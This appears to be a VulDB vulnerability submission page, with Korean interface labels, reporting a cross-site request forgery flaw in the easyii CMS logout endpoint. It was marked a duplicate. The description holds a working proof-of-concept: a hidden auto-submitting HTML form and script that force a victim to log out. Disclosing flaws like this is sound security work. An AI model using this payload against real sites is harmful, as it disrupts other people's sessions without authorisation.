제출 #189: CSRF in easyii CMS logout정보

제목CSRF in easyii CMS logout
설명can force logout any user with vulnerable endpoint: http://example.com/admin/sign/out and automate with auto submit form <form method='GET' action='http://example.com/admin/sign/out' target="csrf-frame" id="csrf-form"> <input type='hidden' name='criticaltoggle' value='true'> <input style="display:none;" type='submit' value='submit'> </form> <script>document.getElementById("csrf-form").submit()</script>
원천⚠️ https://github.com/noumo/easyii/
사용자
 rezaduty (UID 10530)
제출2020. 08. 25. PM 05:22 (6 연령 ago)
모더레이션2020. 08. 26. AM 09:52 (17 hours later)
상태중복
VulDB 항목160278 [easyii CMS /admin/sign/out 교차 사이트 요청 위조]
이유duplicate
포인트들0

이전개요다음

Might our Artificial Intelligence support you?

Check our Alexa App!